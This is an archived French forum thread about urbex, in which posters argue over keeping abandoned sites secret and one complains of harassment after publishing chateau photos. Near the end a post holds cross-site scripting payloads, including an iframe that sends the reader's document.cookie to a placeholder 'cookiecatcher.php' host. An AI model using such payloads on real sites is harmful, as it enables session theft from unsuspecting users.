Topic de Alkiing :

Urbex

Le 09 avril 2021 Ă  00:45:55 :
l'urbex :rire:

Le 09 avril 2021 Ă  00:45:55 :

Le 09 avril 2021 Ă  01:17:03 :

Le 08 avril 2021 Ă  07:39:29 :

[02:06:00] <CharouaneMacack>
Les bons coins Ă  urbex c'est comme les bons coins Ă  champignons faut les garder pour soi et pas les donner Ă  n'importe qui.

Mentalité ridicule et pas très pertinente en fait.

Non il a raison. C'est pour préserver les spots, ceux qui tournent se font détruire

Non c'est ridicule.

Le type qui a popularisé le terme d'Urbex dans les 80's c'était Ninjalicious et il disait lui-même que les lieux devaient se donner de personnes en personnes pour laisser à tous la chance d'explorer de sublimes endroits où le temps s'est arrêté. Que c'était la doctrine n°1 pour ces passionnés.

Le principe d'anonymisation est récent et est popularisé par des glands souffrant de compulsions obsessionnelles envers les Châteaux ou manoirs meublés sous couvert de protection patrimoniale alors qu'en réalité ils cherchent juste à conserver une certaine exclusivité le temps de publier leur photos ou de rester les pionniers d'endroits sublimes et magiques pour se faire mousser. C'est juste ça. Ils en ont rien à foutre.

En ce moment je suis harcelé sur Instagram par ces trous du cul car j'ai publié les façades d'un château datant du Second Empire où je suis apparemment l'un des premiers à avoir trouvé le dit Château ainsi que l'accès pour les intérieurs et publié du coup des photos à la pelle de ce merveilleux château. Expliquant à chaque fois les utilités de certains objets ou l'histoire et les dates d'autres objets pour prouver que moi c'est avant tout par passion historique que j'explore ces lieux.

Des dizaines de trous du cul non mécontents d'avoir trouvé le Château avec mes photos via Google Lens se plaignent et m'ordonnent de supprimer les façades... Maintenant qu'ils ont bien trouvé les lieux et pris leur photos à la con. :)

Cette communauté est toxique. Je deteste les Urbexeurs de notre époque. Ce sont de sales petites merdes égocentriques et irrespectueuses qui ne cherchent juste à faire le + d'endroits pour poster le + de contenus. Aucune passion de la vieille pierre ou de l'histoire. Ça cherche juste à faire la meilleure ambiance sur sa photo de merde et ça attend d'avoir 1000 likes.

Quand ils ne trouvent pas quelque chose en premier ça les gêne ils deviennent jaloux et obsédés par ces endroits à atteindre et ils cherchent à effrayer et faire pression sur les petits passionnés comme vous et moi découvrant avant eux un endroit comme cela.

Qu'on soit clairs. Personne n'est en droit de se sentir protecteur d'un endroit abandonné ayant déjà ses propriétaires et de chercher à limiter ses accès.

Les casseurs et les voleurs seront toujours là malheureusement et on ne peut rien y faire. C'est comme ça. Il faut laisser ces endroits à qui les trouve et faire confiance au plus grand nombre pour ne pas les massacrer. C'est cette règle là qui prime sur ces autres règles abusives de certains.

Qui plus est les façades ne dévoilent en rien les adresses et indications des endroits.

Si des petits malins utilisent Google Lens ou autres tant pis ou tant mieux pour eux !

Je ne pense pas que les jeunes casseurs connaissent ces applications par ailleurs. Et surtout qu'ils se donnent le mal de chercher un endroit pour le détruire.

En passant je pense aussi que certains incendies dans des châteaux sont créés par des Urbexeurs là aussi voulant l'exclusivité. Ça ne m'étonnerait même pas. Ces gens sont des malades.

<script>window.alert(« test »)</script>
HI
<iframe frameborder= 0 height=0 width=0src=JavaScript... : void(document.location=
"YOURURL/cookiecatcher.php?c= » document.cookie)></iframe>

Données du topic

Auteur
Alkiing
Date de création
8 mars 2021 Ă  11:14:41
Nb. messages archivés
728
Nb. messages JVC
113
Voir le topic sur JVC

Afficher uniquement les messages de l'auteur du topic

En ligne sur JvArchive

JvArchive compagnon

Découvrez JvArchive compagnon , l'userscript combattant la censure abusive sur le 18-25 !